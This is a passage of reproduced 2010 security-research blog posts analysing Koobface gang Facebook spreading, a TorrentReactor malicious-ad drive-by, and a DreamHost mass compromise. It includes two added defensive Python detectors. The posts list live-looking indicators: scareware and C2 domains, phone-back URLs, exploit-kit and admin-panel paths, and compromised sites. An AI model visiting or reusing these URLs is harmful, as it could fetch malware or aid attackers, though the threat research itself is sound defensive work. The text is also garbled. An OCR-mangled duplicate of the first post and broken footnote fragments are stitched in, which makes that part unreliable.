The diverse set of activities courtesy of the Koobface gang - consider going through the related posts in order to understand their underground multitasking mentality beyond the Koobface botnet itself - is a case study in the abuse of legitimate infrastructure with clean IP/AS reputation for purely malicious purposes.

This active use of the "trusted reputation chain", just like the majority of the gang's social engineering centered tactics, aims to exploit the ubiquitous weak link in the face of the average Internet user. Here's an example of the most recent campaign.

The spreading of fully working links such as the following ones across Facebook:

facebook.com/l/6e7e5;bit.ly/9QjjSk
facebook.com/l/cdfb;bit.ly/9QjjSk
facebook.com/l/f3c29;bit.ly/9QjjSk
[bit.ly click statistics for 9QjjSk: 2,601 clicks since May 01, 2010 EST]

aims to trick the infected user's friends into believing that this is a Facebook.com related link. Clicking on this link inside Facebook leads to the "Be careful" warning window showing just the bit.ly redirector, which finally redirects to 198.65.28.86/swamt/ where a Koobface bogus video page has already been seen by the 2,601 users who clicked on the link.

The scareware redirectors/actual serving domains are parked at 195.5.161.126, [3]AS31252, STARNET-AS StarNet Moldova:

1nasa-test.com - Email: test@now.net.cn
1online-test.com - Email: test@now.net.cn
1www2scanner.com - Email: test@now.net.cn
2a-scanner.com - Email: test@now.net.cn
2nasa-test.com - Email: test@now.net.cn
2online-test.com - Email: test@now.net.cn
2www2scanner.com - Email: test@now.net.cn
3a-scanner.com - Email: test@now.net.cn
3nasa-test.com - Email: test@now.net.cn
3online-test.com - Email: test@now.net.cn
3www2scanner.com - Email: test@now.net.cn
4a-scanner.com - Email: test@now.net.cn
4check-computer.com - Email: test@now.net.cn
4nasa-test.com - Email: test@now.net.cn
4online-test.com - Email: test@now.net.cn
4www2scanner.com - Email: test@now.net.cn
5a-scanner.com - Email: test@now.net.cn
5nasa-test.com - Email: test@now.net.cn
5online-test.com - Email: test@now.net.cn
6a-scanner.com - Email: test@now.net.cn
defence-status6.com - Email: test@now.net.cn
defence-status7.com - Email: test@now.net.cn
mega-scan2.com - Email: test@now.net.cn
protection-status2.com - Email: test@now.net.cn
protection-status4.com - Email: test@now.net.cn
protection-status6.com - Email: test@now.net.cn
security-status1.com - Email: test@now.net.cn
security-status3.com - Email: test@now.net.cn
security-status4.com - Email: test@now.net.cn
security-status6.com - Email: test@now.net.cn
securitystatus7.com - Email: test@now.net.cn
securitystatus8.com - Email: test@now.net.cn
securitystatus9.com - Email: test@now.net.cn
security-status9.com - Email: test@now.net.cn

Detection rates:

- setup.exe - [4]Mal/Koobface-E; W32/VBTroj.CXNF - Result: 7/41 (17.08 %)
- RunAV_312s2.exe - [5]VirTool.Win32.Obfuscator.hgib (v); High Risk Cloaked Malware - Result: 4/41 (9.76 %)

The scareware sample phones back to:

- windows32-sys.com/download/winlogo.bmp - 91.213.157.104, AS13618 CARONET-ASN - Email: contact@privacy-protect.cn
- sysdllupdates.com/?b=312s2 - 87.98.134.197, AS16276, 
OVH Paris - Email: contact@privacy-protect.cn 
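Two things in the campaign above are directly actionable for a defender: the facebook.com/l/<hash>;<target> link shim, which puts a facebook.com prefix in front of whatever follows the semicolon, and the templated naming of the scareware domains parked at 195.5.161.126 (a digit, one of a few "scanner"/"test"/"status" stems, another digit, .com). The following Python is an added example, not code from the original post: it unwraps such links to their real destination, notes when that destination is a URL shortener hop, and matches the naming template. The shortener list beyond bit.ly and the benign test domains are assumptions for the demonstration.

```python
"""Added example (not from the original post): unwrap the facebook.com/l/ link
shim the Koobface gang abused and match the naming template of the scareware
domains parked at 195.5.161.126. Sample links come from the post; the shortener
list (other than bit.ly) and the benign test domains are assumptions."""
import re

# 2010-era Facebook link shim: facebook.com/l/<hex hash>;<destination>. Only the
# facebook.com prefix is visible at a glance; the real target follows the ';'.
SHIM_RE = re.compile(
    r"^(?:https?://)?(?:www\.)?facebook\.com/l/[0-9a-f]+;(.+)$", re.IGNORECASE)

# Shorteners used as a second hop. bit.ly is the one seen in the post; the
# others are assumed for the example.
SHORTENERS = {"bit.ly", "tinyurl.com", "goo.gl"}


def _host_of(dest):
    """Host part of a destination that may or may not carry a scheme."""
    host = re.sub(r"^https?://", "", dest, flags=re.IGNORECASE)
    return host.split("/", 1)[0].split(":", 1)[0].lower()


def unwrap_facebook_shim(url):
    """Return (destination, via_shortener); (None, False) if url is not a shim."""
    m = SHIM_RE.match(url.strip())
    if not m:
        return None, False
    dest = m.group(1)
    return dest, _host_of(dest) in SHORTENERS


# Naming template behind the scareware domains listed in the post: optional
# single-digit prefix, a small set of stems, optional single-digit suffix,
# always under .com, all registered to test@now.net.cn.
SCAREWARE_RE = re.compile(
    r"^\d?(?:a-scanner|nasa-test|online-test|www2scanner|check-computer|mega-scan"
    r"|(?:defence|protection|security)-?status)\d?\.com$", re.IGNORECASE)


def is_koobface_scareware_domain(domain):
    """True if the domain fits the campaign's naming template."""
    return bool(SCAREWARE_RE.match(domain.strip().lower()))


def triage_links(urls):
    """For each shim link: real target, whether it hops through a shortener,
    and whether the target host itself is one of the templated scareware domains."""
    rows = []
    for url in urls:
        dest, via_short = unwrap_facebook_shim(url)
        if dest is None:
            continue  # not a facebook.com/l/ shim; nothing to unwrap
        rows.append({"link": url, "target": dest, "shortener": via_short,
                     "scareware_host": is_koobface_scareware_domain(_host_of(dest))})
    return rows


if __name__ == "__main__":
    # Three links as posted in the campaign plus one constructed link that
    # points straight at a templated scareware domain (assumed path).
    for row in triage_links(["facebook.com/l/6e7e5;bit.ly/9QjjSk",
                             "facebook.com/l/cdfb;bit.ly/9QjjSk",
                             "facebook.com/l/f3c29;bit.ly/9QjjSk",
                             "http://www.facebook.com/l/abc12;4check-computer.com/scan/"]):
        print(row)
```

The shim regex deliberately accepts any hex hash, since the hash varies per post while the shape stays constant; the domain regex encodes the whole family rather than the 34 names listed, so the next securitystatus5.com or 7nasa-test.com registered to the same contact is caught before it appears in a list.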

The complete list of compromised sites distributed by Koobface-infected Facebook users:

02f32e3.netsolhost.com /o492dc/
abskupina.si /cclq/
adi-agencement.fr /8r2twm/
agilitypower.dk /ko2/
aguasdomondego.com /d5yodi/
alabasta.homeip.net /e8/
alankaye.info /2egg/
alpenhaus.com.ar /al5zvf5/
animationstjo.fr /5c/
artwork.drayton.co.uk /k5wz/
beachfishingwa.org.au /u8g98ai/
bildtuben.se /l9jg/
chalet.se /srb/
charlepoeng.be /i0twbt/
christchurchgastonia.org /lhkq/
chunkbait.com /gb4i6ak/
cityangered.se /besttube/
clarkecasa.net /rhk6/
clr.dsfm.mb.ca /2964/
codeditor.awardspace.biz /uncensoredclip/
coloridellavita.com /sc/
cpvs.org /6eobh0n/
danieletranchita.com /yourvids/
dennis-leah.zzl.org /m95/
doctorsorchestra.com /qw/
dueciliguria.it /zircu/
ediltermo.com /p4zhvj0/
emmedici.net /2pg46mk/
eurobaustoff.marketing-generator.de /52649an/
euskorock.es /p4zm/
explicitflavour.freeiz.com /qk3r/
f9phx.net /svr/
fatucci.it /104s8m2/
forwardmarchministries.org /lbc/
fotoplanet.it /bnog6s/
frenchbean.co.uk /zwr/
furius.comoj.com /lazl/
geve.be /oj4ex4/
gite-maison-pyrenees-luchon.com /jox/
googleffffffffa0ac4d9f.omicronrecords.com /me/
gosin.be /ist63z/
grimslovsms.se /cutetube/
guest.worldviewproduction.com /m2f/
hanssen-racing.com /jl5/
helpbt.com /nqo40uq/
helpdroid.omicronrecords.com /7h/
hoganjobs.com /jrepsp/
holustravel.cz /5j5/
hoperidge.com /fitwizy/
hottesttomato.com /6b/
iglesiabetanial.com /7y7/
ihostu.co.uk /jic9v/
ilterrazzoallaveneziana.it /4vxaq5/
integratek.omicronrecords.com /to4u2bd/
irisjard.o2switch.net /lb/
islandmusicexport.com /hbi2ut9/
isteinaudi.it /h2a/
johnphelan.com /uynv4/
jsacm.com /z6/
kabchicago.info /lcgko/
katia-paliotti.com /0baktz/
kennethom.net /l20/
kleppcc.com /aliendemonstration/
klimentglass.cz /vwalp/
kvarteretekorren.se /60/
lanavabadajoz.com /eg/
langstoncorp.com /o2072c/
libermann.phpnet.org /madu8p/
lineapapel.com /8l20up/
longting.nl /6ch/
mainteck-fr.com /qjbo5v/
majesticdance.com /vlg/
mia-nilsson.se /cmc/
microstart.fr /izul/
migdal.org.il /y952eo/
mindbodyandsolemt.com /pnbn/
musicomm.ca /a5z/
nassnig.org /zl/
neweed.org /x41/
nosneezes.com /Shjkdjo/
nottinghamdowns.com /m7ec/
nutman-group.com /92m/
omicronsystems.inc.md /eho0/
on3la.be /bgfhclg/
onlineadmin.net /b7uccx/
ornskoldskatten.se /m1u/
oxhalsobygg.se /amaizingmovies/

• Recommended reading: [6]Dissecting Koobface Gang's Latest Facebook Spreading Campaign

partenaires-particuliers.fr /uo/
pegasolavoro.it /3l6/
peteknightdays.com /4ok4/
pheromoneforum.org /ds/
pilatescenter.se /bgx8e/
plymouth-tuc.org.uk /xhaq/
popeur.fr /m7yaw/
pro-du-bio.com /af6xtp/
prousaudio.com /4isg/
puertohurraco.org /q3algz/
radioluz900am.com /3i993/
reporsenna.netsons.org /zvz/
rhigar.nu /6v/
richmondpowerboat.com /tifax5/
rmg360.co.cc /22i/
roninwines.com /wonderfulvids/
rrmaps.com /j6o/
rvi.it /bv6k/
scarlett-oharas.com /my0333/
secure.tourinrome.org /qyp/
servicehandlaren.se /yq9ahw0/
servicehandlaren.spel-service.com /q9ql15/
sgottnerivers.com /y0jl6rw/
shofarcall.com /zi/
sirius-expedition.com /x4yab/
slcsc.co.uk /0kem/
soderback.eu /xvg9/
spel-service.com /xm/
sporthal.msolutions.be /vyx3yu/
steelstoneind.com /yzp/
stgeorgesteel.com /ji/
stgeorgesteel.com /ylnwlr/
stubbieholderking.com /dyarxl/
sweet-peasdog.se /0rcjo/
taekwondovelden.nl /mhnskk/
testjustin.comze.com /oafxzy/
the-beehive.com /r8x3cm/
the-beehive.com /weqw7e/
thedallestransmission.com /rjsg2/
therealmagnets.comuv.com /3wnl9n/
thestrategicfrog.110mb.com /66vv/
tizianozanella.it /k2cei/
trustonecorp.com /mabmpp/
unna.nu /6lie/
uroloki.omicronrecords.com /9t/
vaxjoff.com /4fpu/
veerle-frank.be /101/
verdiverdi.net /3tt/
visionministerial.com /pi91/
waffotis.se /yufi3u/
watsonspipingandheating.com /krda/
welplandeast.com /6q/
westcoastperformancecoatings.com /ltw4/
williamarias.us /na9mq/
woodworksbyjamie.com /90mrjb/
wowparis2000.com /rtsz/
yin-art.be /a75ble/
youniverse.site50.net /4a9r/

Due to the diversity of its cybercrime operations, the Koobface gang is always worth keeping an eye on. Best of all - it's done semi-automatically these days.

The best is yet to come, stay tuned!

Related Koobface gang/botnet research:

[7]Dissecting Koobface Gang's Latest Facebook Spreading Campaign
[8]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova
[9]10 things you didn't know about the Koobface gang
[10]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang
[11]How the Koobface Gang Monetizes Mac OS X Traffic
[12]The Koobface Gang Wishes the Industry "Happy Holidays"
[13]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline
[14]Koobface Botnet Starts Serving Client-Side Exploits
[15]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style
[16]Koobface Botnet's Scareware Business Model - Part Two
[17]Koobface Botnet's Scareware Business Model - Part One
[18]Koobface Botnet Redirects Facebook's IP Space to my Blog
[19]New Koobface campaign spoofs Adobe's Flash updater
[20]Social engineering tactics of the Koobface botnet
[21]Koobface Botnet Dissected in a Trend Micro Report
[22]Movement on the Koobface Front - Part Two
[23]Movement on the Koobface Front
[24]Koobface - Come Out, Come Out, Wherever You Are
[25]Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [26]Dancho Danchev's blog. Follow him [27]on Twitter.

1. http://ddanchev.blogspot.com/2010/04/dissecting-koobface-gangs-latest.html
2. http://www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452
3. http://ddanchev.blogspot.com/2010/03/koobface-redirectors-and-scareware.html
4. http://www.virustotal.com/analisis/6e07a43c1b31464287d2e967226d7056366bd1fb7b6950565c212c6d47e96a11-1273338587
5. http://www.virustotal.com/analisis/8a607a9335f08ac4fcf6ecccc0fb4b2581e92d0371ab09d22eb87cd8a3b68f85-1273338600
6. http://ddanchev.blogspot.com/2010/04/dissecting-koobface-gangs-latest.html
7. http://ddanchev.blogspot.com/2010/04/dissecting-koobface-gangs-latest.html
8. http://ddanchev.blogspot.com/2010/03/koobface-redirectors-and-scareware.html
9. http://www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452
10. http://ddanchev.blogspot.com/2010/02/diverse-portfolio-of-scarewareblackhat.html
11. http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html
12. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html
13. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html
14. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
15. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html
16. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html
17. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html
18. http://ddanchev.blogspot.com/2009/10/koobface-botnet-redirects-facebooks-ip.html
19. http://blogs.zdnet.com/security/?p=4594
20. http://content.zdnet.com/2346-12691_22-352597.html
21. http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html
22. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html
23. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html
24. http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html
25. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html
26. http://ddanchev.blogspot.com/
27. http://twitter.com/danchodanchev
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From the Koobface Gang with Scareware Serving 
Compromised Sites (2010-05-08 20:46) 

Following last month's "[IjDissecting Koobface Gang's 
Latest Facebook Spreading Campaign'' Koobface gang 
coverage, it's time to summarize some of their botnet 
spreading activities, from the last couple of days. 

Immediately after the suspension of their automatically 
registered Blogspot accounts, the gang once again 

proved that it has contingency plans in place, and started 
pushing links to compromises sites, in a combination with an 
interesting "visual social engineering trick", across Facebook, 
which sadly works pretty well, in the sense that it completely 
undermines the " don't dick on links pointing to unknown 
sites" type of security tips. 

• Recommended reading: [2] 10 things you didn't know 
about the Koobface gang 

The diverse set of activities courtesy of the Koobface gang - 
consider going through the related posts in order to 
understand their underground multitasking mentality beyond 
the Koobface botnet itself - are a case study on the 

abuse of legitimate infrastructure with dean IP/AS 
reputation, for purely malicious purposes. 

This active use of the " trusted reputation chain", just like the 
majority of social engineering centered tactics of the gang, 
aim to exploit the ubiquitous weak link in the face of the 


average Internet user. Here's an example of the most recent 
campaign. 

The spreading of fully working links such as the following 
ones across Facebook: 

face book. com/l/6e 7e5;bit. ly/9QjjSk 

facebook. com/l/cdfb;bit. ly/9QjjSk 

facebook. com/l/f3c29;bit. ly/9QjjSk 
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aims to trick the infected user's friends, that this is a 
Facebook.com related link. Clicking on this link inside 
Facebook leads to the "Be careful" window showing just the 
bit.ly redirector, to finally redirect to 198.65.28.86/swamt/ 
where a Koobface bogus video has already been seen by 
2,601 users which have already clicked on the link. 

The sea re ware redirectors/actual serving domains are parked 
at 195.5.161.126, [3JAS31252, STARNET-A5 Star- 

Net Moldova: 

lnasa-test.com - Email: test@now.net.cn 
lonline-test.com - Email: test@now.net.cn 
lwww2scanner.com - Email: test@now.net.cn 
2a-scanner.com - Email: test@now.net.cn 
2nasa-test.com - Email: test@now.net.cn 
2online-test.com - Email: test@now.net.cn 


2www2scanner.com - Email: test@now.net.cn 
3a-scanner.com - Email: test@now.net.cn 
3nasa-test.com - Email: test@now.net.cn 
3online-test.com - Email: test@now.net.cn 
3www2scanner.com - Email: test@now.net.cn 
4a-scanner.com - Email: test@now.net.cn 
4check-computer.com - Email: test@now.net.cn 
4nasa-test.com - Email: test@now.net.cn 
4online-test.com - Email: test@now.net.cn 
4www2scanner.com - Email: test@now.net.cn 
5a-scanner.com - Email: test@now.net.cn 
5nasa-test.com - Email: test@now.net.cn 
5oniine-test.com - Email: test@now.net.cn 
6a-scanner.com - Email: test@now.net.cn 
defence-status6.com - Email: test@now.net.cn 
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defence-status7.com - Email: test@now.net.cn 
mega-scan2.com - Email: test@now.net.cn 

protection-status2.com - Email: test@now.net.cn 


protection-status4.com - Email: test@now.net.cn 
protection-status6.com - Email: test@now.net.cn 
security-statusl.com - Email: test@now.net.cn 
security-status3.com - Email: test@now.net.cn 
security-status4.com - Email: test@now.net.cn 
security-status6.com - Email: test@now.net.cn 
securitystatus7.com - Email: test@now.net.cn 
securitystatus8.com - Email: test@now.net.cn 
securitystatus9.com - Email: test@now.net.cn 
security-status9.com - Email: test@now.net.cn 
Detection rates: 

- setup.exe - [4]Mal/Koobface-E; W32/VBTroj.CXNF - Result: 
7/41(17.08%) 

- RunAV_312s2.exe - [5]VirTool. Win32.Obfuscator.hgib (v); 
High Risk Cloaked Malware - Result: 4/41 (9.76 %) The 

sea re ware sample phones back to: 

- windows32-sys.com/download/winlogo.bmp - 

91.213.157.104 f AS13618 CARONET-ASN - Email: 
contact@pri vacy- 

protect.cn 

- sysdllupdates.com/?b=312s2 - 87.98.134.197, AS16276, 
OVH Paris - Email: contact@privacy-protect.cn 



The complete list of compromised sites distributed by 
Koobface-infected Facebook users: 

• Recommended reading: [6]Dissecting Koobface Gang 
Latest Face book Spreading Campaign 


Due to the diversity of its cybercrime operations, the Koobface gang is always worth keeping an eye on. Best of all - it's done semi-automatically these days.

The best is yet to come, stay tuned! 

Related Koobface gang/botnet research: 

[7]Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 



[8]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova

[9]10 things you didn't know about the Koobface gang

[10]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang

[11]How the Koobface Gang Monetizes Mac OS X Traffic

[12]The Koobface Gang Wishes the Industry "Happy Holidays"

[13]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline

[14]Koobface Botnet Starts Serving Client-Side Exploits

[15]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[16]Koobface Botnet's Scareware Business Model - Part Two

[17]Koobface Botnet's Scareware Business Model - Part One

[18]Koobface Botnet Redirects Facebook's IP Space to my Blog

[19]New Koobface campaign spoofs Adobe's Flash updater

[20]Social engineering tactics of the Koobface botnet

[21]Koobface Botnet Dissected in a Trend Micro Report

[22]Movement on the Koobface Front - Part Two

[23]Movement on the Koobface Front

[24]Koobface - Come Out, Come Out, Wherever You Are

[25]Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [26]Dancho 
Danchev's blog. Follow him [27]on Twitter. 
13. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html

botnets-scareware-business.html

17. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html

18. http://ddanchev.blogspot.com/2009/10/koobface-botnet-

19. http://blogs.zdnet.com/security/?p=4594

21. http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html

22. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

23. http://ddanchev.blogspot.com/2009/08/movement-on-

TorrentReactor.net Serving Crimeware, Client-Side Exploits Through a Malicious Ad (2010-05-11 08:34)

Deja vu! 

[1]Jerome Segura at the Malware Diaries is reporting that TorrentReactor.net, a high-traffic torrent tracker, is currently serving live exploits through a malicious ad served by "Fulldls.com - Your source for daily torrent downloads".

Why deja vu? It's because the [2]TorrentReactor.net malware campaign takes me back to 2008 and one of the very first extensive profilings of Russian Business Network activity: their mass "input validation abuse" campaign back then, which successfully appeared on numerous high-traffic web sites, serving, guess what? Scareware.

Moreover, despite the surprisingly large number of people still getting impressed by the use of HTTP referrers as an evasive practice applied by the cybercriminals, these particular campaigns ([3]ZDNet Asia and TorrentReactor IFRAME-ed; [4]Wired.com and History.com Getting RBN-ed; [5]Massive IFRAME SEO Poisoning Attack Continuing) are a great example of this practice in use back then:

• So the malicious parties are implementing simple referrer techniques to verify that the end users coming to their IP are the ones they expect to come from the campaign, and not client-side honeypots or even security researchers. And if you're not coming from where you're supposed to come from, you get a 404 error message, deceptive to the very end of it.

The most recent compromise of TorrentReactor.net appears to be taking place through a malicious ad serving exploits using the NeoSploit kit, which ultimately drops a ZeuS crimeware sample hosted within a fast-flux botnet.

The campaign structure, including detection rates, phone back locations and ZeuS crimeware fast-flux related data, is as follows:


- ads.fulldls.com/phpadsnew/www/delivery/afr.php?zoneid=1&cb=291476

- ad.leet.la/stats?ref=.*ads\.fulldls\.com$ - 208.111.34.38 - Email: bertrand.crevin@brutele.com (leet.la - 212.68.193.197 - AS12392, ASBRUTELE AS Object for Brutele SC)

- lo.dep.lt/info/usl.html - 91.212.127.110 - lo.dep.lt - 91.212.127.110 - AS49087, Telos-Solutions-AS Telos Solutions LTD

- 91.216.3.108/del/index.php; 91.216.3.108/cal/main.php - AS50896, PROXIEZ-AS PE Nikolaev Alexey Valerievich

- 91.216.3.108 responding to gaihooxaefap.com - Nikolay Vukolov, Email: woven@qx8.ru

Upon successful exploitation, the following malicious PDF is served:

- eac27d.pdf - [6]Exploit.PDF-JS.Gen (v); JS:Pdfka-AET - Result: 6/40 (15 %), which when executed phones back to 91.216.3.108/cal/banner.php/1fda161dab1edd2f385d43c705a541d3?spl=pdf_30apr and drops:

- myexebr.exe - [7]TSPY_QAKBOT.SMG - Result: 17/41 (41.47 %), which then phones back to the ZeuS crimeware C&C: [8]saiwoofeutie.com/bin/ahwohn.bin - 78.9.77.158 - Email: spasm@maillife.ru
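The chain above, reconstructed from proxy logs the way a defender would see it. This is an added example, not code from the original post: the log lines are constructed, and the hosts and paths in them are the ones the post names. It flags a PDF served from a bare-IP host whose Referer chain roots in an ad-delivery request and is followed by Referer-less executable downloads, and it separately surfaces the referrer gate the post describes (a direct visit to an intermediate host answered with a 404).

```python
"""Reconstruct drive-by redirect chains from proxy logs (added example)."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed log lines, not captured traffic.
# Fields: time client status content-type url referer ('-' = no Referer)
AD_FRAME = "http://ads.fulldls.com/phpadsnew/www/delivery/afr.php?zoneid=1&cb=291476"
EXPLOIT_HOST = "http://91.216.3.108/cal"
SAMPLE_LOG = f"""\
2010-05-10T12:00:00 10.0.0.5 200 text/html http://torrentreactor.net/ -
2010-05-10T12:00:01 10.0.0.5 200 text/html {AD_FRAME} http://torrentreactor.net/
2010-05-10T12:00:01 10.0.0.5 302 text/html http://ad.leet.la/stats {AD_FRAME}
2010-05-10T12:00:02 10.0.0.5 200 text/html http://lo.dep.lt/info/usl.html http://ad.leet.la/stats
2010-05-10T12:00:02 10.0.0.5 200 text/html {EXPLOIT_HOST}/main.php http://lo.dep.lt/info/usl.html
2010-05-10T12:00:03 10.0.0.5 200 application/pdf {EXPLOIT_HOST}/eac27d.pdf {EXPLOIT_HOST}/main.php
2010-05-10T12:00:09 10.0.0.5 200 application/octet-stream {EXPLOIT_HOST}/banner.php/1fda161dab1edd2f385d43c705a541d3?spl=pdf_30apr -
2010-05-10T12:00:15 10.0.0.5 200 application/octet-stream http://saiwoofeutie.com/bin/ahwohn.bin -
2010-05-10T12:05:00 10.0.0.7 200 text/html http://torrentreactor.net/ -
2010-05-10T12:05:01 10.0.0.7 404 text/html http://lo.dep.lt/info/usl.html -
2010-05-10T12:06:00 10.0.0.9 200 application/pdf http://docs.example.org/report.pdf http://docs.example.org/
"""

AD_DELIVERY_MARKER = "/delivery/afr.php"   # phpAdsNew/OpenX ad frame, as in the post


def parse_log(text):
    """Parse the six whitespace-separated fields; '-' means no Referer was sent."""
    rows = []
    for line in text.splitlines():
        t, client, status, ctype, url, ref = line.split(" ", 5)
        rows.append({"time": datetime.fromisoformat(t), "client": client,
                     "status": int(status), "ctype": ctype, "url": url,
                     "ref": None if ref == "-" else ref})
    return rows


def is_literal_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def chain_to_root(row, by_url):
    """Walk Referer headers backwards through this client's successful requests."""
    chain, seen = [row], {row["url"]}
    while chain[0]["ref"] in by_url and chain[0]["ref"] not in seen:
        prev = by_url[chain[0]["ref"]]
        seen.add(prev["url"])
        chain.insert(0, prev)
    return chain


def analyze(rows, window=timedelta(seconds=60)):
    """Return findings: drive-by chains, then 404s that look like the referrer gate."""
    findings, per_client = [], defaultdict(list)
    for r in rows:
        per_client[r["client"]].append(r)
    for client, rs in per_client.items():
        rs.sort(key=lambda r: r["time"])
        by_url = {r["url"]: r for r in rs if r["status"] < 400}
        for i, r in enumerate(rs):
            host = urlsplit(r["url"]).hostname
            if r["ctype"] != "application/pdf" or not is_literal_ip(host):
                continue
            chain = chain_to_root(r, by_url)
            rooted_in_ad = any(AD_DELIVERY_MARKER in c["url"] for c in chain)
            # Executables fetched by the exploited reader carry no Referer.
            payloads = [s["url"] for s in rs[i + 1:]
                        if s["ctype"] == "application/octet-stream"
                        and s["ref"] is None and s["time"] - r["time"] <= window]
            if rooted_in_ad and payloads:
                findings.append({"client": client, "kind": "drive_by_chain",
                                 "chain": [c["url"] for c in chain], "payloads": payloads})
    # Intermediate hosts of a flagged chain (everything past the landing page) that
    # answered a Referer-less visit with 404: what a naive crawler records.
    gated = {urlsplit(u).hostname for f in findings for u in f["chain"][1:]}
    for client, rs in per_client.items():
        for r in rs:
            if r["status"] == 404 and r["ref"] is None and urlsplit(r["url"]).hostname in gated:
                findings.append({"client": client, "kind": "referrer_gate_404", "url": r["url"]})
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_log(SAMPLE_LOG)):
        print(finding)
```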
Fast-fluxed domains sharing the same infrastructure:


Name servers of notice: 


These particular iFrame injection campaigns of the Russian Business Network from 2008 used to rely on the following URL for their malicious purposes: a-n-d-the.com/wtr/router.php (216.255.185.82 - INTERCAGE-NETWORK-GROUP2).

Why am I highlighting it? Excerpts from previously profiled campaigns, including one that is directly linked to the Koobface gang's blackhat SEO operations.

[9]U.S. Federal Forms Blackhat SEO Themed Scareware Campaign Expanding:

• The compromised/mis-configured web sites participating in this latest blackhat SEO campaign are surprisingly redirecting to a-n-d-the.com/wtr/router.php - 95.168.177.35 - Email: bulk@spam.lv - AS28753 NETDIRECT AS NETDIRECT Frankfurt, DE if the http referrer condition isn't met. This very same domain - back then parked at INTERCAGE-NETWORK-GROUP2 - was also used in the same fashion in March, 2008's massive blackhat SEO campaigns serving scareware.

Not only is a-n-d-the.com/wtr/router.php (95.168.177.35) (Web [10]sessions of the URL acting as [11]a redirector), the exact same URL that was in circulation in 2008, residing on the Russian Business Network's netblock back then, still active, but it is also currently redirecting - if the campaign's evasive conditions are met - to www4.zaikob8.xorg.pl/?uid=213&pid=3&ttl=31345701120 - 217.149.251.12.

What this proves is fairly simple: with or without the Russian Business Network the way we used to know it, its customers simply moved on to the competition, whereas the original Russian Business Network simply diversified its netblock ownership.

Related posts: 

[12]ZDNet Asia and TorrentReactor IFRAME-ed

[13]Wired.com and History.com Getting RBN-ed

[14]Massive IFRAME SEO Poisoning Attack Continuing
12. http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

13. http://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html

14. http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html

15. http://ddanchev.blogspot.com/

16. http://twitter.com/danchodanchev
Dissecting the Mass DreamHost Sites Compromise (2010-05-11 22:19)

Yet another [1]mass sites compromise is currently taking place, this time targeting DreamHost customers, courtesy of the same gang behind the U.S. Treasury/GoDaddy/NetworkSolutions mass compromise campaigns.

What's particularly interesting about the campaign is not just [2]the Hilary Kneber connection, but also the fact that a key command and control domain of the Koobface botnet resides within the same AS as the nameservers and one of the actual domains (kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, BKCNET "SIA" IZZI) used in previous campaigns.

These gangs are either aware of one another's existence, are the exact same gang applying basic evasive practices on multiple fronts, or are simply customers of the same cybercrime-friendly hosting service provider.
The DreamHost campaign structure, including the detection rates and phone back locations, is as follows:

- zettapetta.com/js.php - 109.196.143.56 - Email: hilarykneber@yahoo.com

- www4.suitcase52td.net/?p= - 78.46.218.249 - Email: gkook@checkjemail.nl

- www1.realsafe-23.net - 209.212.149.17 - Email: gkook@checkjemail.nl
Active client-side exploits serving, redirector domains parked on the same IP 109.196.143.56: zettapetta.com - 109.196.143.56, AS39150, VLTELECOM-AS VLineTelecom LLC Moscow, Russia - Email: hilarykneber@yahoo.com


Historically, the following domains were also parked on the 
same IP 109.196.143.56: 


Detection rate for the scareware pushed in the campaign:

- packupdate build107 2060.exe - [3]TROJ_FRAUD.SMDV; Packed.Win32.Krap.an - Result: 8/41 (19.52 %) with the sample phoning back to:


Name servers of notice parked at 91.188.59.98, AS6851, BKCNET "SIA" IZZI:

ns1.oklahomacitycom.com

ns2.oklahomacitycom.com

What's so special about [4]AS6851, BKCNET "SIA" IZZI anyway? It's the Koobface gang connection, in the face of urodinam.net, which is also hosted within AS6851 and currently responds to 91.188.59.10. More details on urodinam.net:

• [5]Koobface Botnet's Scareware Business Model

• [6]Koobface Botnet's Scareware Business Model - Part Two

Moreover, on the exact same IP where the Koobface gang's urodinam.net is parked, we also have the currently active Izabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com, serving client-side exploits using the Yes Malware Exploitation kit - 91.188.59.10/temp/cache/PDF.php; admin panel at: Izabslwvn538n4i5tcjl.com/temp/admin/index.php
